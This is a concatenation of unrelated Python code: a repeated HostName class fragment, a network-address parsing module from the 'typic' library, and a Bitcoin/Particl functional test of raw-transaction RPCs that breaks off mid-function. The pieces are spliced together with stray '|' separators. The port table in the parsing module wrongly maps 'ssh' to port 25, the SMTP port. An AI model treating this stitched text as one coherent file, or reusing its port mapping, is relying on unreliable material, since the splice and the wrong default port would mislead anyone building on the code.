class HostName(NetworkAddress):
"""A network address referencing only a host-name (e.g. foo.bar.com).
See Also
--------
:py:class:`NetworkAddress`
:py:class:`NetAddrInfo`
Notes
-----
This object inherits directly from :py:class:`NetworkAddress` and, so is natively
JSON-serializable.
"""
def __new__(cls, *args, **kwargs):
v = super().__new__(cls, *args, **kwargs)
if not v.info.host or any((v.info.scheme, v.info.auth, v.info.relative)):
raise HostNameValueError(f"<{v!r}> is not a hostname.") from None
return v
| from __future__ import annotations
import dataclasses
import re
from collections import defaultdict
from types import MappingProxyType
from typing import Dict, List, ClassVar, Pattern, Match, Mapping, Set, Optional
from urllib import parse
from typic.util import cached_property, slotted
from .secret import SecretStr
__all__ = (
"NetAddrInfo",
"NetworkAddress",
"NetworkAddressValueError",
"AbsoluteURL",
"AbsoluteURLValueError",
"HostName",
"HostNameValueError",
"RelativeURL",
"RelativeURLValueError",
"URL",
)
# By no means an exhaustive list, but a decent chunk of use-cases
DEFAULT_PORTS = defaultdict(
set,
{
"http": {80},
"https": {443},
"ws": {80},
"wss": {443},
"smtp": {25},
"ftp": {20, 21},
"telnet": {23},
"imap": {143},
"rdp": {3389},
"ssh": {25},
"dns": {53},
"dhcp": {67, 68},
"pop3": {110},
"mysql": {3306},
"vertica": {5434},
"postgresql": {5432},
},
)
NET_ADDR_PATTERN = re.compile(
r"""
^
(
# Scheme
((?P<scheme>(?:[a-z0-9\.\-\+]*))://)?
# Auth
(?P<auth>(?:(?P<username>[^:@]+?)[:@](?P<password>[^:@]*?)[:@]))?
# Host
(?P<host>(?:
# Domain
(?P<domain>
(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+
(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)
)
# Localhost
|(?P<localhost>localhost)
|(?P<dotless>(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.?))
# IPV4
|(?P<ipv4>\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})
# IPV6
|(?P<ipv6>\[[A-F0-9]*:[A-F0-9:]+\])
))?
# Port
(:(?P<port>(?:\d+)))?
)?
# Path, Q-string & fragment
(?P<relative>(?:/?|[/?#]\S+))
$
""",
re.IGNORECASE | re.VERBOSE,
)
PRIVATE_HOSTS = {"localhost", "127.0.0.1"}
INTERNAL_HOSTS = PRIVATE_HOSTS | {"0.0.0.0"}
INTERNAL_IP_PATTERN = re.compile(
r"""
^
# IPv4
(127\.)|
(192\.168\.)|
(10\.)|(172\.1[6-9]\.)|
(172\.2[0-9]\.)|(172\.3[0-1]\.)|
# IPv6
(::1)|([F][CD])
$
""",
re.I | re.VERBOSE,
)
class NetworkAddressValueError(ValueError):
"""A generic error indicating the value is not a valid network address."""
@slotted(dict=True)
@dataclasses.dataclass(frozen=True)
class NetAddrInfo:
"""Detailed information about a network address.
Can be called directly, generated by casting a :py:class:`str` as
:py:class:`NetworkAddress`, or created with :py:meth:`NetAddrInfo.from_str`
"""
scheme: str
"""The net-address scheme, e.g., `http`, `tcp`, `ssh`, etc."""
auth: str
"""The user auth info."""
password: SecretStr
"""The user's password."""
host: str
"""The host for this addres, e.g. `0.0.0.0`, `foobar.net`."""
port: int
"""The port for this net-address"""
path: str
"""The URI path."""
qs: str
"""The query-string, unparsed, e.g. `?id=1&name=foo`"""
params: str
"""The url parameters, unparsed, e.g. `id=2;foo=bar`"""
fragment: str
"""The uri fragment, e.g. `#some-page-anchor`"""
is_ip: bool = False
PATTERN: ClassVar[Pattern] = NET_ADDR_PATTERN
DEFAULT_PORTS: ClassVar[Dict] = DEFAULT_PORTS
PRIVATE_HOSTS: ClassVar[Set[str]] = PRIVATE_HOSTS
INTERNAL_HOSTS: ClassVar[Set[str]] = INTERNAL_HOSTS
@classmethod
def from_str(cls, value) -> "NetAddrInfo":
"""Parse a string, validate, and return an instance of :py:class:`NetAddrInfo`."""
match: Optional[Match] = cls.PATTERN.match(value)
if not match or not value:
raise NetworkAddressValueError(f"{value!r} is not a valid network address.")
scheme, host = match["scheme"] or "", match["host"] or ""
if scheme and not host:
raise NetworkAddressValueError(f"{value!r} is not a valid network address.")
# why re-invent the wheel here? this is fast and correct.
parsed: parse.ParseResult = parse.urlparse(match["relative"] or "")
# get/set the port
port = int(match["port"] or 0)
if port == 0 and cls.DEFAULT_PORTS[scheme]:
port = cls.DEFAULT_PORTS[scheme].copy().pop()
return cls(
scheme=scheme,
auth=match["auth"] or "",
password=SecretStr(match["password"] or ""),
host=host,
port=port,
path=parsed.path,
qs=parsed.query,
params=parsed.params,
fragment=parsed.fragment,
is_ip=bool(match["ipv4"] or match["ipv6"]),
)
@cached_property
def base(self) -> str:
"""The 'base' of the URL, including scheme, auth, and host."""
base = f"{self.scheme}://" if self.scheme else ""
port = f":{self.port}" if self.port and not self.is_default_port else ""
return f"{base}{self.auth}{self.host}{port}"
@cached_property
def relative(self):
"""The 'relative' portion of the URL: path, params, query, and fragment."""
params = f";{self.params}" if self.params else ""
qs = f"?{self.qs}" if self.qs else ""
fragment = f"#{self.fragment}" if self.fragment else ""
return f"{self.path}{params}{qs}{fragment}"
@cached_property
def address(self) -> str:
"""The fully-qualified network address.
If this instance was generated from a string, it will match."""
return f"{self.base}{self.relative}"
@cached_property
def address_encoded(self) -> str:
"""The fully-qualified network address, encoded."""
return parse.quote(self.address) # type: ignore
@cached_property
def query(self) -> Mapping[str, List[str]]:
"""The query-string, parsed into a mapping of key -> [values, ...]."""
return MappingProxyType(parse.parse_qs(self.qs) if self.qs else {})
@cached_property
def parameters(self) -> Mapping[str, List[str]]:
"""The params, parsed into a mapping of key -> [values, ...]."""
return MappingProxyType(parse.parse_qs(self.params) if self.params else {})
@cached_property
def is_default_port(self) -> bool:
"""Whether address is using the default port assigned to the given scheme."""
defaults = DEFAULT_PORTS[self.scheme] | {0}
return self.port in defaults
@cached_property
def is_relative(self) -> bool:
"""Whether address is 'relative' (i.e., whether a scheme is provided)."""
return not self.scheme
@cached_property
def is_absolute(self) -> bool:
"""The opposite of `is_relative`."""
return not self.is_relative
@cached_property
def is_private(self) -> bool:
"""Whether or not the URL is using a 'private' host, i.e., 'localhost'."""
return self.host in PRIVATE_HOSTS
@cached_property
def is_internal(self) -> bool:
"""Whether the host provided is an 'internal' host.
This may or may not be private, hence the distinction."""
return bool(
self.host
and self.host in INTERNAL_HOSTS
or (self.is_ip and INTERNAL_IP_PATTERN.match(self.host))
)
# Deepcopy is broken for frozen dataclasses with slots.
# https://github.com/python/cpython/pull/17254
# NetAddrInfo.__slots__ = tuple(
# _.name for _ in dataclasses.fields(NetAddrInfo)
# )
class NetworkAddress(str):
"""A generic, immutable network address string.
Detailed information about the network address string can be looked up via
:py:attr:`NetworkAddress.info`.
This object is the base object for network-related objects.
:py:class:`URL` has a much richer interface.
Examples
--------
>>> import typic
>>> net_addr = typic.NetworkAddress("http://foo.bar/bazz;foo=bar?buzz=1#loc")
>>> net_addr.info.is_absolute
True
>>> net_addr.info.host
'foo.bar'
>>> net_addr.info.scheme
'http'
>>> net_addr.info.address_encoded
'http%3A//foo.bar/bazz%3Bfoo%3Dbar%3Fbuzz%3D1%23loc'
>>> net_addr.info.query
mappingproxy({'buzz': ['1']})
>>> net_addr.info.parameters
mappingproxy({'foo': ['bar']})
>>> net_addr.info.fragment
'loc'
>>> domain = typic.URL("foo.bar")
>>> domain.info.is_relative
True
>>> domain.info.host
'foo.bar'
>>> net_addr
'http://foo.bar/bazz;foo=bar?buzz=1#loc'
>>> import json
>>> json.dumps([net_addr])
'["http://foo.bar/bazz;foo=bar?buzz=1#loc"]'
See Also
--------
:py:class:`NetAddrInfo`
:py:class:`URL`
Notes
-----
This object inherits directly from :py:class:`str` and so is natively
JSON-serializable.
"""
def __new__(cls, *args, **kwargs):
v = super().__new__(cls, *args, **kwargs)
# Initialize the info so we get validation immediately.
v.info
return v
def __setattr__(self, key, value):
raise AttributeError(
f"attempting to set attribute on immutable type {type(self)}"
)
def __delattr__(self, key):
raise AttributeError(
f"attempting to delete attribute on immutable type {type(self)}"
)
@cached_property
def info(self) -> NetAddrInfo:
return NetAddrInfo.from_str(self)
class URLValueError(NetworkAddressValueError):
"""Generic error for an invalid value passed to URL."""
pass
class URL(NetworkAddress):
"""A string which parses the value provided as if it were a URL.
Detailed information about the url string can be looked up via :py:attr:`URL.info`.
Examples
--------
>>> import typic
>>> url = typic.URL("http://foo.bar/bazz")
>>> more = url / 'foo' / 'bar'
>>> more
'http://foo.bar/bazz/foo/bar'
>>> typic.URL(url.info.base) / 'other'
'http://foo.bar/other'
See Also
--------
:py:class:`NetworkAddress`
:py:class:`NetAddrInfo`
Notes
-----
This object inherits directly from :py:class:`NetworkAddress` and so is natively
JSON-serializable.
"""
def join(self, other) -> "URL":
"""Join another URL with this one.
This works roughly like :py:meth:`pathlib.Path.joinpath`.
Unlike :py:func:`urllib.parse.urljoin`, this method allows the user to build
onto existing paths.
"""
cls = type(self)
# best guess at the path
other_info: NetAddrInfo = cls(other).info # type: ignore
self_info: NetAddrInfo = self.info # type: ignore
other = (other_info.path or parse.urlparse(other).path or "").lstrip("/")
other = f"{self_info.path.rstrip('/') or ''}/{other}"
return cls(parse.urljoin(self_info.base, other)) # type: ignore
def __truediv__(self, other) -> "URL":
"""Overloading some operators to make it easier. Uses `:py:meth:`URL.join`."""
return self.join(other)
def __rtruediv__(self, other) -> "URL":
return URL(other) / self
class AbsoluteURLValueError(URLValueError):
pass
class AbsoluteURL(URL):
"""An absolute URL.
See Also
--------
:py:class:`URL`
"""
def __new__(cls, *args, **kwargs):
v = super().__new__(cls, *args, **kwargs)
if v.info.is_relative:
raise AbsoluteURLValueError(f"<{v!r}> is not an absolute URL.") from None
return v
class RelativeURLValueError(URLValueError):
pass
class RelativeURL(URL):
"""A relative URL.
See Also
--------
:py:class:`URL`
"""
def __new__(cls, *args, **kwargs):
v = super().__new__(cls, *args, **kwargs)
if v.info.is_absolute:
raise RelativeURLValueError(f"<{v!r}> is not a relative URL.") from None
return v
class HostNameValueError(NetworkAddressValueError):
pass
class HostName(NetworkAddress):
"""A network address referencing only a host-name (e.g. foo.bar.com).
See Also
--------
:py:class:`NetworkAddress`
:py:class:`NetAddrInfo`
Notes
-----
This object inherits directly from :py:class:`NetworkAddress` and, so is natively
JSON-serializable.
"""
def __new__(cls, *args, **kwargs):
v = super().__new__(cls, *args, **kwargs)
if not v.info.host or any((v.info.scheme, v.info.auth, v.info.relative)):
raise HostNameValueError(f"<{v!r}> is not a hostname.") from None
return v
|
#!/usr/bin/env python3
# Copyright (c) 2014-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the rawtransaction RPCs.
Test the following RPCs:
- getrawtransaction
- createrawtransaction
- signrawtransactionwithwallet
- sendrawtransaction
- decoderawtransaction
"""
from collections import OrderedDict
from decimal import Decimal
from test_framework.blocktools import COINBASE_MATURITY
from test_framework.messages import (
CTransaction,
tx_from_hex,
)
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
find_vout_for_address,
)
TXID = "1d1d4e24ed99057e84c3f80fd8fbec79ed9e1acee37da269356ecea000000000"
class multidict(dict):
"""Dictionary that allows duplicate keys.
Constructed with a list of (key, value) tuples. When dumped by the json module,
will output invalid json with repeated keys, eg:
>>> json.dumps(multidict([(1,2),(1,2)])
'{"1": 2, "1": 2}'
Used to test calls to rpc methods with repeated keys in the json object."""
def __init__(self, x):
dict.__init__(self, x)
self.x = x
def items(self):
return self.x
class RawTransactionsTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 4
self.extra_args = [
["-txindex"],
["-txindex"],
["-txindex"],
[],
]
# whitelist all peers to speed up tx relay / mempool sync
for args in self.extra_args:
args.append("-whitelist=noban@127.0.0.1")
self.supports_cli = False
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def setup_network(self):
super().setup_network()
self.connect_nodes(0, 2)
def run_test(self):
self.log.info("Prepare some coins for multiple *rawtransaction commands")
self.generate(self.nodes[2], 1)
self.sync_all()
self.generate(self.nodes[0], COINBASE_MATURITY + 1)
self.sync_all()
for amount in [1.5, 1.0, 5.0]:
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), amount)
self.sync_all()
self.generate(self.nodes[0], 5)
self.sync_all()
self.getrawtransaction_tests()
self.createrawtransaction_tests()
self.signrawtransactionwithwallet_tests()
self.sendrawtransaction_tests()
self.sendrawtransaction_testmempoolaccept_tests()
self.decoderawtransaction_tests()
self.transaction_version_number_tests()
if not self.options.descriptors:
self.raw_multisig_transaction_legacy_tests()
def getrawtransaction_tests(self):
addr = self.nodes[1].getnewaddress()
txid = self.nodes[0].sendtoaddress(addr, 10)
self.generate(self.nodes[0], 1)
self.sync_all()
vout = find_vout_for_address(self.nodes[1], txid, addr)
rawTx = self.nodes[1].createrawtransaction([{'txid': txid, 'vout': vout}], {self.nodes[1].getnewaddress(): 9.999})
rawTxSigned = self.nodes[1].signrawtransactionwithwallet(rawTx)
txId = self.nodes[1].sendrawtransaction(rawTxSigned['hex'])
self.generate(self.nodes[0], 1)
self.sync_all()
for n in [0, 3]:
self.log.info(f"Test getrawtransaction {"with" if n == 0 else "without"} -txindex")
# 1. valid parameters - only supply txid
assert_equal(self.nodes[n].getrawtransaction(txId), rawTxSigned['hex'])
# 2. valid parameters - supply txid and 0 for non-verbose
assert_equal(self.nodes[n].getrawtransaction(txId, 0), rawTxSigned['hex'])
# 3. valid parameters - supply txid and False for non-verbose
assert_equal(self.nodes[n].getrawtransaction(txId, False), rawTxSigned['hex'])
# 4. valid parameters - supply txid and 1 for verbose.
# We only check the "hex" field of the output so we don't need to update this test every time the output format changes.
assert_equal(self.nodes[n].getrawtransaction(txId, 1)["hex"], rawTxSigned['hex'])
# 5. valid parameters - supply txid and True for non-verbose
assert_equal(self.nodes[n].getrawtransaction(txId, True)["hex"], rawTxSigned['hex'])
# 6. invalid parameters - supply txid and invalid boolean values (strings) for verbose
for value in ["True", "False"]:
assert_raises_rpc_error(-1, "not a boolean", self.nodes[n].getrawtransaction, txid=txId, verbose=value)
# 7. invalid parameters - supply txid and empty array
assert_raises_rpc_error(-1, "not a boolean", self.nodes[n].getrawtransaction, txId, [])
# 8. invalid parameters - supply txid and empty dict
assert_raises_rpc_error(-1, "not a boolean", self.nodes[n].getrawtransaction, txId, {})
# Make a tx by sending, then generate 2 blocks; block1 has the tx in it
tx = self.nodes[2].sendtoaddress(self.nodes[1].getnewaddress(), 1)
block1, block2 = self.generate(self.nodes[2], 2)
self.sync_all()
for n in [0, 3]:
self.log.info(f"Test getrawtransaction {"with" if n == 0 else "without"} -txindex, with blockhash")
# We should be able to get the raw transaction by providing the correct block
gottx = self.nodes[n].getrawtransaction(txid=tx, verbose=True, blockhash=block1)
assert_equal(gottx['txid'], tx)
assert_equal(gottx['in_active_chain'], True)
if n == 0:
self.log.info("Test getrawtransaction with -txindex, without blockhash: 'in_active_chain' should be absent")
gottx = self.nodes[n].getrawtransaction(txid=tx, verbose=True)
assert_equal(gottx['txid'], tx)
assert 'in_active_chain' not in gottx
else:
self.log.info("Test getrawtransaction without -txindex, without blockhash: expect the call to raise")
err_msg = (
"No such mempool transaction. Use -txindex or provide a block hash to enable"
" blockchain transaction queries. Use gettransaction for wallet transactions."
)
assert_raises_rpc_error(-5, err_msg, self.nodes[n].getrawtransaction, txid=tx, verbose=True)
# We should not get the tx if we provide an unrelated block
assert_raises_rpc_error(-5, "No such transaction found", self.nodes[n].getrawtransaction, txid=tx, blockhash=block2)
# An invalid block hash should raise the correct errors
assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[n].getrawtransaction, txid=tx, blockhash=True)
assert_raises_rpc_error(-8, "parameter 3 must be of length 64 (not 6, for 'foobar')", self.nodes[n].getrawtransaction, txid=tx, blockhash="foobar")
assert_raises_rpc_error(-8, "parameter 3 must be of length 64 (not 8, for 'abcd1234')", self.nodes[n].getrawtransaction, txid=tx, blockhash="abcd1234")
foo = "ZZZ0000000000000000000000000000000000000000000000000000000000000"
assert_raises_rpc_error(-8, f"parameter 3 must be hexadecimal string (not '{foo}')", self.nodes[n].getrawtransaction, txid=tx, blockhash=foo)
bar = "0000000000000000000000000000000000000000000000000000000000000000"
assert_raises_rpc_error(-5, "Block hash not found", self.nodes[n].getrawtransaction, txid=tx, blockhash=bar)
# Undo the blocks and verify that "in_active_chain" is false.
self.nodes[n].invalidateblock(block1)
gottx = self.nodes[n].getrawtransaction(txid=tx, verbose=True, blockhash=block1)
assert_equal(gottx['in_active_chain'], False)
self.nodes[n].reconsiderblock(block1)
assert_equal(self.nodes[n].getbestblockhash(), block2)
self.log.info("Test getrawtransaction on genesis block coinbase returns an error")
block = self.nodes[0].getblock(self.nodes[0].getblockhash(0))
assert_raises_rpc_error(-5, "The genesis block coinbase is not considered an ordinary transaction", self.nodes[0].getrawtransaction, block['merkleroot'])
def createrawtransaction_tests(self):
self.log.info("Test createrawtransaction")
# Test `createrawtransaction` required parameters
assert_raises_rpc_error(-1, "createrawtransaction", self.nodes[0].createrawtransaction)
assert_raises_rpc_error(-1, "createrawtransaction", self.nodes[0].createrawtransaction, [])
# Test `createrawtransaction` invalid extra parameters
assert_raises_rpc_error(-1, "createrawtransaction", self.nodes[0].createrawtransaction, [], {}, 0, False, 'foo')
# Test `createrawtransaction` invalid `inputs`
assert_raises_rpc_error(-3, "Expected type array", self.nodes[0].createrawtransaction, 'foo', {})
assert_raises_rpc_error(-1, "JSON value is not an object as expected", self.nodes[0].createrawtransaction, ['foo'], {})
assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[0].createrawtransaction, [{}], {})
assert_raises_rpc_error(-8, "txid must be of length 64 (not 3, for 'foo')", self.nodes[0].createrawtransaction, [{'txid': 'foo'}], {})
txid = "ZZZ7bb8b1697ea987f3b223ba7819250cae33efacb068d23dc24859824a77844"
assert_raises_rpc_error(-8, f"txid must be hexadecimal string (not '{txid}')", self.nodes[0].createrawtransaction, [{'txid': txid}], {})
assert_raises_rpc_error(-8, "Invalid parameter, missing vout key", self.nodes[0].createrawtransaction, [{'txid': TXID}], {})
assert_raises_rpc_error(-8, "Invalid parameter, missing vout key", self.nodes[0].createrawtransaction, [{'txid': TXID, 'vout': 'foo'}], {})
assert_raises_rpc_error(-8, "Invalid parameter, vout cannot be negative", self.nodes[0].createrawtransaction, [{'txid': TXID, 'vout': -1}], {})
# sequence number out of range
for invalid_seq in [-1, 4294967296]:
inputs = [{'txid': TXID, 'vout': 1, 'sequence': invalid_seq}]
outputs = {self.nodes[0].getnewaddress(): 1}
assert_raises_rpc_error(-8, 'Invalid parameter, sequence number is out of range',
self.nodes[0].createrawtransaction, inputs, outputs)
# with valid sequence number
for valid_seq in [1000, 4294967294]:
inputs = [{'txid': TXID, 'vout': 1, 'sequence': valid_seq}]
outputs = {self.nodes[0].getnewaddress(): 1}
rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
decrawtx = self.nodes[0].decoderawtransaction(rawtx)
assert_equal(decrawtx['vin'][0]['sequence'], valid_seq)
# Test `createrawtransaction` invalid `outputs`
address = self.nodes[0].getnewaddress()
address2 = self.nodes[0].getnewaddress()
assert_raises_rpc_error(-1, "JSON value is not an array as expected", self.nodes[0].createrawtransaction, [], 'foo')
self.nodes[0].createrawtransaction(inputs=[], outputs={}) # Should not throw for backwards compatibility
self.nodes[0].createrawtransaction(inputs=[], outputs=[])
assert_raises_rpc_error(-8, "Data must be hexadecimal string", self.nodes[0].createrawtransaction, [], {'data': 'foo'})
assert_raises_rpc_error(-5, "Invalid Particl address", self.nodes[0].createrawtransaction, [], {'foo': 0})
assert_raises_rpc_error(-3, "Invalid amount", self.nodes[0].createrawtransaction, [], {address: 'foo'})
assert_raises_rpc_error(-3, "Amount out of range", self.nodes[0].createrawtransaction, [], {address: -1})
assert_raises_rpc_error(-8, "Invalid parameter, duplicated address: %s" % address, self.nodes[0].createrawtransaction, [], multidict([(address, 1), (address, 1)]))
assert_raises_rpc_error(-8, "Invalid parameter, duplicated address: %s" % address, self.nodes[0].createrawtransaction, [], [{address: 1}, {address: 1}])
assert_raises_rpc_error(-8, "Invalid parameter, duplicate key: data", self.nodes[0].createrawtransaction, [], [{"data": 'aa'}, {"data": "bb"}])
assert_raises_rpc_error(-8, "Invalid parameter, duplicate key: data", self.nodes[0].createrawtransaction, [], multidict([("data", 'aa'), ("data", "bb")]))
assert_raises_rpc_error(-8, "Invalid parameter, key-value pair must contain exactly one key", self.nodes[0].createrawtransaction, [], [{'a': 1, 'b': 2}])
assert_raises_rpc_error(-8, "Invalid parameter, key-value pair not an object as expected", self.nodes[0].createrawtransaction, [], [['key-value pair1'], ['2']])
# Test `createrawtransaction` invalid `locktime`
assert_raises_rpc_error(-3, "Expected type number", self.nodes[0].createrawtransaction, [], {}, 'foo')
assert_raises_rpc_error(-8, "Invalid parameter, locktime out of range", self.nodes[0].createrawtransaction, [], {}, -1)
assert_raises_rpc_error(-8, "Invalid parameter, locktime out of range", self.nodes[0].createrawtransaction, [], {}, 4294967296)
# Test `createrawtransaction` invalid `replaceable`
assert_raises_rpc_error(-3, "Expected type bool", self.nodes[0].createrawtransaction, [], {}, 0, 'foo')
# Test that createrawtransaction accepts an array and object as outputs
# One output
tx = tx_from_hex(self.nodes[2].createrawtransaction(inputs=[{'txid': TXID, 'vout': 9}], outputs={address: 99}))
assert_equal(len(tx.vout), 1)
assert_equal(
tx.serialize().hex(),
self.nodes[2].createrawtransaction(inputs=[{'txid': TXID, 'vout': 9}], outputs=[{address: 99}]),
)
# Two outputs
tx = tx_from_hex(self.nodes[2].createrawtransaction(inputs=[{'txid': TXID, 'vout': 9}], outputs=OrderedDict([(address, 99), (address2, 99)])))
assert_equal(len(tx.vout), 2)
assert_equal(
tx.serialize().hex(),
self.nodes[2].createrawtransaction(inputs=[{'txid': TXID, 'vout': 9}], outputs=[{address: 99}, {address2: 99}]),
)
# Multiple mixed outputs
tx = tx_from_hex(self.nodes[2].createrawtransaction(inputs=[{'txid': TXID, 'vout': 9}], outputs=multidict([(address, 99), (address2, 99), ('data', '99')])))
assert_equal(len(tx.vout), 3)
assert_equal(
tx.serialize().hex(),
self.nodes[2].createrawtransaction(inputs=[{'txid': TXID, 'vout': 9}], outputs=[{address: 99}, {address2: 99}, {'data': '99'}]),
)
def signrawtransactionwithwallet_tests(self):
for type in ["bech32", "p2sh-segwit", "legacy"]:
self.log.info(f"Test signrawtransactionwithwallet with missing prevtx info ({type})")
addr = self.nodes[0].getnewaddress("", type)
addrinfo = self.nodes[0].getaddressinfo(addr)
pubkey = addrinfo["scriptPubKey"]
inputs = [{'txid': TXID, 'vout': 3, 'sequence': 1000}]
outputs = {self.nodes[0].getnewaddress(): 1}
rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
prevtx = dict(txid=TXID, scriptPubKey=pubkey, vout=3, amount=1)
succ = self.nodes[0].signrawtransactionwithwallet(rawtx, [prevtx])
assert succ["complete"]
if type == "legacy":
del prevtx["amount"]
succ = self.nodes[0].signrawtransactionwithwallet(rawtx, [prevtx])
assert succ["complete"]
else:
assert_raises_rpc_error(-3, "Missing amount", self.nodes[0].signrawtransactionwithwallet, rawtx, [
{
"txid": TXID,
"scriptPubKey": pubkey,
"vout": 3,
}
])
assert_raises_rpc_error(-3, "Missing vout", self.nodes[0].signrawtransactionwithwallet, rawtx, [
{
"txid": TXID,
"scriptPubKey": pubkey,
"amount": 1,
}
])
assert_raises_rpc_error(-3, "Missing txid", self.nodes[0].signrawtransactionwithwallet, rawtx, [
{
"scriptPubKey": pubkey,
"vout": 3,
"amount": 1,
}
])
assert_raises_rpc_error(-3, "Missing scriptPubKey", self.nodes[0].signrawtransactionwithwallet, rawtx, [
{
"txid": TXID,
"vout": 3,
"amount": 1
}
])
def sendrawtransaction_tests(self):
self.log.info("Test sendrawtransaction with missing input")
inputs = [{'txid': TXID, 'vout': 1}] # won't exist
outputs = {self.nodes[0].getnewaddress(): 4.998}
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
rawtx = self.nodes[2].signrawtransactionwithwallet(rawtx)
assert_raises_rpc_error(-25, "bad-txns-inputs-missingorspent", self.nodes[2].sendrawtransaction, rawtx['hex'])
def sendrawtransaction_testmempoolaccept_tests(self):
self.log.info("Test sendrawtransaction/testmempoolaccept with maxfeerate")
fee_exceeds_max = "Fee exceeds maximum configured by user (e.g. -maxtxfee, maxfeerate)"
# Test a transaction with a small fee.
txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.0)
rawTx = self.nodes[0].getrawtransaction(txId, True)
vout = next(o for o in rawTx['vout'] if o['value'] == Decimal('1.00000000'))
self.sync_all()
inputs = [{"txid": txId, "vout": vout['n']}]
# Fee 10,000 satoshis, (1 - (10000 sat * 0.00000001 BTC/sat)) = 0.9999
outputs = {self.nodes[0].getnewaddress(): Decimal("0.99990000")}
rawTx = self.nodes[2].createrawtransaction(inputs, outputs)
rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx)
assert_equal(rawTxSigned['complete'], True)
# Fee 10,000 satoshis, ~100 b transaction, fee rate should land around 100 sat/byte = 0.00100000 BTC/kB
# Thus, testmempoolaccept should reject
testres = self.nodes[2].testmempoolaccept([rawTxSigned['hex']], 0.00001000)[0]
assert_equal(testres['allowed'], False)
assert_equal(testres['reject-reason'], 'max-fee-exceeded')
# and sendrawtransaction should throw
assert_raises_rpc_error(-25, fee_exceeds_max, self.nodes[2].sendrawtransaction, rawTxSigned['hex'], 0.00001000)
# and the following calls should both succeed
testres = self.nodes[2].testmempoolaccept(rawtxs=[rawTxSigned['hex']])[0]
assert_equal(testres['allowed'], True)
self.nodes[2].sendrawtransaction(hexstring=rawTxSigned['hex'])
# Test a transaction with a large fee.
txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.0)
rawTx = self.nodes[0].getrawtransaction(txId, True)
vout = next(o for o in rawTx['vout'] if o['value'] == Decimal('1.00000000'))
self.sync_all()
inputs = [{"txid": txId, "vout": vout['n']}]
# Fee 2,000,000 satoshis, (1 - (2000000 sat * 0.00000001 BTC/sat)) = 0.98
outputs = {self.nodes[0].getnewaddress() : Decimal("0.98000000")}
rawTx = self.nodes[2].createrawtransaction(inputs, outputs)
rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx)
assert_equal(rawTxSigned['complete'], True)
# Fee 2,000,000 satoshis, ~100 b transaction, fee rate should land around 20,000 sat/byte = 0.20000000 BTC/kB
# Thus, testmempoolaccept should reject
testres = self.nodes[2].testmempoolaccept([rawTxSigned['hex']])[0]
assert_equal(testres['allowed'], False)
assert_equal(testres['reject-reason'], 'max-fee-exceeded')
# and sendrawtransaction should throw
assert_raises_rpc_error(-25, fee_exceeds_max, self.nodes[2].sendrawtransaction, rawTxSigned['hex'])
# and the following calls should both succeed
testres = self.nodes[2].testmempoolaccept(rawtxs=[rawTxSigned['hex']], maxfeerate='0.20000000')[0]
assert_equal(testres['allowed'], True)
self.nodes[2].sendrawtransaction(hexstring=rawTxSigned['hex'], maxfeerate='0.20000000')
self.log.info("Test sendrawtransaction/testmempoolaccept with tx already in the chain")
self.generate(self.nodes[2], 1)
self.sync_blocks()
for node in self.nodes:
testres = node.testmempoolaccept([rawTxSigned['hex']])[0]
assert_equal(testres['allowed'], False)
assert_equal(testres['reject-reason'], 'txn-already-known')
assert_raises_rpc_error(-27, 'Transaction already in block chain', node.sendrawtransaction, rawTxSigned['hex'])
def decoderawtransaction_tests(self):
self.log.info("Test decoderawtransaction")
# witness transaction
encrawtx = "010000000001010000000000000072c1a6a246ae63f74f931e8365e15a089c68d61900000000000000000000ffffffff0100e1f50500000000000102616100000000"
decrawtx = self.nodes[0].decoderawtransaction(encrawtx, True) # decode as witness transaction
assert_equal(decrawtx['vout'][0]['value'], Decimal('1.00000000'))
assert_raises_rpc_error(-22, 'TX decode failed', self.nodes[0].decoderawtransaction, encrawtx, False) # force decode as non-witness transaction
# non-witness transaction
encrawtx = "01000000010000000000000072c1a6a246ae63f74f931e8365e15a089c68d61900000000000000000000ffffffff0100e1f505000000000000000000"
decrawtx = self.nodes[0].decoderawtransaction(encrawtx, False) # decode as non-witness transaction
assert_equal(decrawtx['vout'][0]['value'], Decimal('1.00000000'))
# known ambiguous transaction in the chain (see https://github.com/bitcoin/bitcoin/issues/20579)
coinbase = "03c68708046ff8415c622f4254432e434f4d2ffabe6d6de1965d02c68f928e5b244ab1965115a36f56eb997633c7f690124bbf43644e23080000000ca3d3af6d005a65ff0200fd00000000"
encrawtx = f"020000000001010000000000000000000000000000000000000000000000000000000000000000ffffffff4b{coinbase}" \
"ffffffff03f4c1fb4b0000000016001497cfc76442fe717f2a3f0cc9c175f7561b6619970000000000000000266a24aa21a9ed957d1036a80343e0d1b659497e1b48a38ebe876a056d45965fac4a85cda84e1900000000000000002952534b424c4f434b3a8e092581ab01986cbadc84f4b43f4fa4bb9e7a2e2a0caf9b7cf64d939028e22c0120000000000000000000000000000000000000000000000000000000000000000000000000"
decrawtx = self.nodes[0].decoderawtransaction(encrawtx)
decrawtx_wit = self.nodes[0].decoderawtransaction(encrawtx, True)
assert_raises_rpc_error(-22, 'TX decode failed', self.nodes[0].decoderawtransaction, encrawtx, False) # fails to decode as non-witness transaction
assert_equal(decrawtx, decrawtx_wit) # the witness interpretation should be chosen
assert_equal(decrawtx['vin'][0]['coinbase'], coinbase)
def transaction_version_number_tests(self):
self.log.info("Test transaction version numbers")
# Test the minimum transaction version number that fits in a signed 32-bit integer.
# As transaction version is unsigned, this should convert to its unsigned equivalent.
